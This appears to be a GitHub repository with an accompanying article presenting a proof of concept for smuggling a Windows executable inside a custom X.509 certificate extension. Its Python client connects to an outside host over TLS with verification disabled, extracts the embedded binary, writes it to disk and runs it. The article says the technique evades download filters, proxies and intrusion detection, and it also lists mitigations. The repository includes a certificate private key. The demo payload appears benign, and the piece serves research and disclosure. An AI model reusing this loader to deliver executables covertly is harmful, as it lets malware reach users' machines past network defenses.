├── README.md ├── EXEfromCER.py ├── srkey.pem ├── srcert.pem ├── cert.ini └── Article.md /README.md: -------------------------------------------------------------------------------- 1 | # EXEfromCER 2 | This is a proof of concept to deliver a binary payload via an X.509 TLS certificate. 3 | It embeds a full Windows executable inside a custom extension of an X.509 certificate and serves it via HTTPS. The client extracts the payload from the certificate and executes it. 4 | 5 | 1. Generate a certificate with a custom OID extension containing your binary. (openssl req -new -x509 -days 365 -config cert.ini -keyout srkey.pem -out srcert.pem -nodes) 6 | 2. Serve it over TLS (e.g., with OpenSSL). 7 | 3. Python client connects to the SSL server, extracts the binary, writes it to disk, and runs it. 8 | 9 | image 10 | -------------------------------------------------------------------------------- /EXEfromCER.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import ssl, socket 3 | from cryptography import x509 4 | from cryptography.hazmat.backends import default_backend 5 | 6 | print("Getting SSL certificate from SecurityRabbits.com...") 7 | hostname = 'securityrabbits.com' 8 | ctx = ssl._create_unverified_context() 9 | with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s: 10 | s.connect((hostname, 4443)) 11 | cert_der = s.getpeercert(binary_form=True) 12 | cert = x509.load_der_x509_certificate(cert_der, backend=default_backend()) 13 | payload = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.2.3.4.5.6")).value.value 14 | with open("securityrabbits.exe", "wb") as f: 15 | f.write(payload) 16 | 17 | print("SecurityRabbits.exe is ready.\nRunning...\n") 18 | subprocess.run(["SecurityRabbits.exe"]) 19 | -------------------------------------------------------------------------------- /srkey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCr4Yzy5yzjl7V7 3 | fqr9N431VBONEubnpm1pz6k8coHH8dn2YUg48We4yTyodnmopevUekD3HNS8pEbf 4 | zgcBPYiGQmjjvXpe5/XruuI2SRK5XEF43jO3Nv3ZMR5aW/5RtJzJ12QsvhePoN2c 5 | qjlwdmplhiYEm8V99sI1DorwtfKvTmoNgi9bCYOgX8EAwzQyCtAupttkZinvzBLD 6 | 0nuE9XowP2DOk4qOXGKwbDudA11tcEzvfeJtDWWSLdzCZPI0Y14aE0KHiJZYi4rC 7 | l8YUB6cGcjC1v04VbLIAMG/sctmf3IvGpYC2XLriXSKERckPx+6gUshLzM3kiuZ9 8 | PBKvhNATAgMBAAECggEBAIEmbZ5nDlfFOtychSbXg5d/oWEzfsU5TKVhIC0HbXUr 9 | yTdUScxfuCwlKar7utZ6NgXmBsKnq0JDve2VBbZs4hTf+aiGS1jcuvBx8GAR8DvP 10 | knKbpAhbDcsRGVmUHjiOmfEgI2lrPJDzsxFw5tAWakP21MJJuc+4hp0PXF8amEwY 11 | SFWgUmN2JmlUmbFONN7cSQg8pPXQ51YUR0ycGoe2Nc3vUN1PQQdg/APARWJK+PRb 12 | R90ibF9zIRrG2QGKi8luOUbu/56zW4X75duqmcfRAIzn6x9uqjckSTIzMV6uQB0n 13 | dXI1qE9+eYoTZLivM+a35tQk2Dw8c5kuLWKKQYRkFwECgYEA1afwBVvh5OzwaRv7 14 | OrthTcIXmSej3ParKUoBEizXxNagsV+D2OvTiORPi9rgTSVlFgt5PNM95P0e6+kM 15 | TZb2U5DKXtFmFE4pJcI9sI8myxae3YrSbVmPYhmYKNQLNBhV57Nz52XRekBCOjYr 16 | fLIFrBzW1Nn5HAsr8QRU1oJjPSECgYEAzfId8apvfxia2a63WTII2jchSqrFxHE9 17 | NL87nO+kHZd6N9eIJM0sZueEgdS5rnJ75e+WuEO0F6TMy4AOsPI3EMoUJD+cqeAs 18 | uZhl8zy/tf913+haZLo1b+PzsTMQtiBd+W1nkW10Wjpwq3sk0TY1eT6IF8mjXo8a 19 | 2AYOvoB80rMCgYBmZwZoWyCK63FSv4GLJdI+RZ+v3Urxlhx1Pq4CuxFzm3cLbH8y 20 | Ed2iR+NEYdSNxTWM+lTSbWDGBveyFFG8QnWvmb8U8QIfC1M3cMDGheYPArmD74xp 21 | srpBR4khUHhKMLvDwMP1jVx4XqIfamUvb9e+JVhmTk7SPRyDeRL8eSP9YQKBgQDI 22 | ck5YyAVLU/xrwRTteLiLA7ugfASPRZRIAZUZE1nN/4BSV7JH93avFcmvwAeV1hHn 23 | Y8FzyVnA5YL60sH50VZtPfJKsate4DVH0x/vlgIWNvVYoENS5LZcGCc5IjWyvmAZ 24 | BDYYosrrgxPko6/a/QMg5g758CTVRT3gYkz5d/+F5wKBgQCMFHuYWC4t9LHSAj0a 25 | o77PExU7nrE4GBLeq8d7oy+PLCWc5540JdQXeOMjCXQQ8DaQbsSAjAh0MkX46AxK 26 | v+1w00BQlbCoeSAtCMMn1KZK1nCNAcyMBYWHdYCBCn7le7ww/QIO3gIgZ36zP0qZ 27 | h+qrxkYruVMNc0n05UCx7SKNPw== 28 | -----END PRIVATE KEY----- 29 | -------------------------------------------------------------------------------- /srcert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIM3zCCC8egAwIBAgIUJMmZ5RY/ZXfqV+rIUxWJjxaousYwDQYJKoZIhvcNAQEL 3 | BQAwHjEcMBoGA1UEAwwTc2VjdXJpdHlyYWJiaXRzLmNvbTAeFw0yNTA3MjYwMTA5 4 | NTdaFw0yNjA3MjYwMTA5NTdaMB4xHDAaBgNVBAMME3NlY3VyaXR5cmFiYml0cy5j 5 | b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCr4Yzy5yzjl7V7fqr9 6 | N431VBONEubnpm1pz6k8coHH8dn2YUg48We4yTyodnmopevUekD3HNS8pEbfzgcB 7 | PYiGQmjjvXpe5/XruuI2SRK5XEF43jO3Nv3ZMR5aW/5RtJzJ12QsvhePoN2cqjlw 8 | dmplhiYEm8V99sI1DorwtfKvTmoNgi9bCYOgX8EAwzQyCtAupttkZinvzBLD0nuE 9 | 9XowP2DOk4qOXGKwbDudA11tcEzvfeJtDWWSLdzCZPI0Y14aE0KHiJZYi4rCl8YU 10 | B6cGcjC1v04VbLIAMG/sctmf3IvGpYC2XLriXSKERckPx+6gUshLzM3kiuZ9PBKv 11 | hNATAgMBAAGjggoTMIIKDzCCCgsGBSoDBAUGBIIKAE1akAADAAAABAAAAP//AAC4 12 | AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAO 13 | H7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBt 14 | b2RlLg0NCiQAAAAAAAAAR29MaW5rLCBHb0FzbSB3d3cuR29EZXZUb29sLmNvbQBQ 15 | RQAATAEDAJjgemgAAAAAAAAAAOAAAwELAQEAAAIAAAAEAAAAAAAAABAAAAAQAAAA 16 | IAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABAAAAABAAAua4AAAMAAAAA 17 | ABAAAAABAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACQwAAAoAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAC50ZXh0AAAAIAAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAu 21 | ZGF0YQAAACAAAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAADALmlkYXRhAACY 22 | AAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAIAAAYAAAAAAAAAAAAAAAAAAAAAAA 23 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 24 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 25 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 27 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 28 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 29 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 30 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 31 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 32 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABq 33 | 9egJIAAAagBqAGofaAAgQABQ6P4fAABqAOj9HwAAAAAAAAAAAAAAAAAAAAAAAAAA 34 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 35 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 36 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 37 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 38 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 39 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 40 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 41 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 42 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 43 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEhpIGZyb20gU2VjdXJpdHlS 44 | YWJiaXRzLmNvbSAhDQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 45 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 46 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 47 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 48 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 49 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 50 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 51 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 52 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 53 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 54 | AAAAAAAAAAAAAAAAAAAAajAAAHowAACKMAAAAAAAAP8lADBAAP8lBDBAAP8lCDBA 55 | AAAATDAAAAAAAAAAAAAAXDAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGowAAB6 56 | MAAAijAAAAAAAABLRVJORUwzMi5kbGwAAPsCR2V0U3RkSGFuZGxlAABEBldyaXRl 57 | Q29uc29sZUEAfwFFeGl0UHJvY2VzcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 58 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 59 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 60 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 61 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 62 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 63 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 64 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw 65 | DQYJKoZIhvcNAQELBQADggEBAFH30Ww1WQN7ebBFtI6Fz7fM6QMfC2L2fcSpPqCA 66 | TNXfOB882t9C/VFFdqrcXxCwWHwT81ArShY3baZVdd2h/mSFT2G6/VR/hgCjnI1y 67 | tF2yEEQMbz2pr9zMJeXniK0HfXcclhZNZEpI1u7UwOkCiZqSf8BX3akiXxlkFKv4 68 | QZz/HhsIgFNQXkw3WD4OES8O5GmWapdXX/yJvxP1PwdqEhCHH/rPtQiW/Lctd7+p 69 | d1OQv38YLz+BGCEq0cEtipxjEAiAA8zlz/wbIWpCutEK5ZLBPZO7QoB6+V8ft1r3 70 | rmwOhNAsuz2KXIfvxgHeSAYJSc3M3wv4/HyaWGjSVQkDCU0= 71 | -----END CERTIFICATE----- 72 | -------------------------------------------------------------------------------- /cert.ini: -------------------------------------------------------------------------------- 1 | [ req ] 2 | distinguished_name = dn 3 | x509_extensions = ext 4 | prompt = no 5 | 6 | [ dn ] 7 | CN = securityrabbits.com 8 | 9 | [ ext ] 10 | 1.2.3.4.5.6=DER:4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000a00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000476f4c696e6b2c20476f41736d207777772e476f446576546f6f6c2e636f6d00504500004c01030098e07a680000000000000000e00003010b010100000200000004000000000000001000000010000000200000000040000010000000020000040000000000000004000000000000000040000000040000b9ae00000300000000001000000001000000100000100000000000001000000000000000000000002430000028000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000100000000000000000000000000000000000000000000000000000002e7465787400000020000000001000000002000000040000000000000000000000000000200000602e6461746100000020000000002000000002000000060000000000000000000000000000400000c02e696461746100009800000000300000000200000008000000000000000000000000000020000060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006af5e8092000006a006a006a1f680020400050e8fe1f00006a00e8fd1f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000048692066726f6d205365637572697479526162626974732e636f6d20210d0a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006a3000007a3000008a30000000000000ff2500304000ff2504304000ff250830400000004c30000000000000000000005c3000000030000000000000000000000000000000000000000000006a3000007a3000008a300000000000004b45524e454c33322e646c6c0000fb0247657453746448616e646c65000044065772697465436f6e736f6c6541007f014578697450726f6365737300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 11 | -------------------------------------------------------------------------------- /Article.md: -------------------------------------------------------------------------------- 1 | # Payloads Over TLS: Smuggling Executables Inside X.509 Certificates 2 | 3 | ## Introduction 4 | 5 | Transport Layer Security (TLS) is widely used to protect the confidentiality and integrity of network traffic. But what if the very mechanism designed to secure traffic could be used to **deliver a payload**? 6 | This proof of concept (PoC) demonstrates how an attacker can embed a full Windows executable inside an X.509 certificate extension and deliver it over HTTPS. Once the client connects and retrieves the certificate, it can extract and execute the binary locally. 7 | No traditional download. No HTTP request. Just **certificate data**. 8 | 9 | To the best of my knowledge, this technique of embedding and extracting a full binary payload from an X.509 certificate extension has not been publicly demonstrated before. If similar research or PoCs exist, I would appreciate references or contact. ==> https://www.extrahop.com/blog/stop-ssl-tls-exfil does exactly this since 2018 10 | 11 | --- 12 | 13 | ## The Concept 14 | 15 | 1. **Create a benign-looking certificate** 16 | * Embed a binary payload (e.g., a PE executable) in a custom extension 17 | * Use OpenSSL to generate the certificate 18 | 2. **Serve the certificate over HTTPS** 19 | * Use a TLS server with the custom certificate (e.g., `openssl s_server`) 20 | 3. **Extract the binary on the client** 21 | * Use a Python script to connect, retrieve the certificate, extract the payload, and run it 22 | 4. **(Optional)** If an outbound proxy **does not perform SSL inspection**, the payload reaches the client untouched. 23 | 24 | --- 25 | 26 | ## How It Works 27 | 28 | ### Certificate Extension 29 | 30 | We use OpenSSL with a custom config: 31 | 32 | ```ini 33 | [ req ] 34 | distinguished_name = dn 35 | x509_extensions = ext 36 | prompt = no 37 | 38 | [ dn ] 39 | CN = securityrabbits.com 40 | 41 | [ ext ] 42 | 1.2.3.4.5.6=DER:4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000a00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000476f4c696e6b2c20476f41736d207777772e476f446576546f6f6c2e636f6d00504500004c01030098e07a680000000000000000e00003010b010100000200000004000000000000001000000010000000200000000040000010000000020000040000000000000004000000000000000040000000040000b9ae00000300000000001000000001000000100000100000000000001000000000000000000000002430000028000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000100000000000000000000000000000000000000000000000000000002e7465787400000020000000001000000002000000040000000000000000000000000000200000602e6461746100000020000000002000000002000000060000000000000000000000000000400000c02e696461746100009800000000300000000200000008000000000000000000000000000020000060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006af5e8092000006a006a006a1f680020400050e8fe1f00006a00e8fd1f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000048692066726f6d205365637572697479526162626974732e636f6d20210d0a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006a3000007a3000008a30000000000000ff2500304000ff2504304000ff250830400000004c30000000000000000000005c3000000030000000000000000000000000000000000000000000006a3000007a3000008a300000000000004b45524e454c33322e646c6c0000fb0247657453746448616e646c65000044065772697465436f6e736f6c6541007f014578697450726f6365737300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 43 | ``` 44 | 45 | Here, the executable is converted to a hexadecimal string and placed in a custom extension identified by an arbitrary OID (e.g., `1.2.3.4.5.6`). 46 | 47 | --- 48 | 49 | ## Client Extraction Script (Python) 50 | 51 | ```python 52 | import subprocess 53 | import ssl, socket 54 | from cryptography import x509 55 | from cryptography.hazmat.backends import default_backend 56 | 57 | print("Getting SSL certificate from SecurityRabbits.com...") 58 | hostname = 'securityrabbits.com' 59 | ctx = ssl._create_unverified_context() 60 | with ctx.wrap_socket(socket.socket(), server_hostname=hostname) as s: 61 | s.connect((hostname, 4443)) 62 | cert_der = s.getpeercert(binary_form=True) 63 | cert = x509.load_der_x509_certificate(cert_der, backend=default_backend()) 64 | payload = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.2.3.4.5.6")).value.value 65 | with open("securityrabbits.exe", "wb") as f: 66 | f.write(payload) 67 | 68 | print("SecurityRabbits.exe is ready.\nRunning...\n") 69 | subprocess.run(["SecurityRabbits.exe"]) 70 | ``` 71 | 72 | --- 73 | 74 | ## Why It Matters 75 | 76 | * **Bypasses traditional download filters**: There’s no HTTP GET, no `.exe` URL, and nothing obvious to block. 77 | * **Evasive**: Most IDS/IPS, proxies, and firewalls do not deeply parse certificate fields. 78 | * **Portable**: This can be adapted to other formats (e.g., PEM) or platforms. 79 | 80 | --- 81 | 82 | ## Mitigations 83 | 84 | * **TLS inspection (MITM)**: Proxies that inspect and re-sign TLS traffic typically strip custom extensions. 85 | * **Certificate parsing rules**: Security tools should flag unusual or oversized X.509 extensions. 86 | * **Payload detection**: Endpoint detection should still flag and block unexpected binaries. 87 | 88 | --- 89 | 90 | ## Limitations 91 | 92 | * Size is capped (\~64 KB, depending on the TLS stack) 93 | * Client must parse and extract the payload 94 | * May not work against all servers/clients due to extension parsing differences 95 | 96 | --- 97 | 98 | ## Source Code 99 | 100 | Full source is available on GitHub: 101 | **[https://github.com/jeanlucdupont/EXEfromCER](https://github.com/jeanlucdupont/EXEfromCER)** 102 | 103 | --- 104 | 105 | ## Conclusion 106 | 107 | Certificates are usually seen as static and boring. But they can become a **covert channel** for data exfiltration, payload delivery, or even steganography. This PoC is a reminder: **don’t trust blindly just because it’s wrapped in TLS.** 108 | --------------------------------------------------------------------------------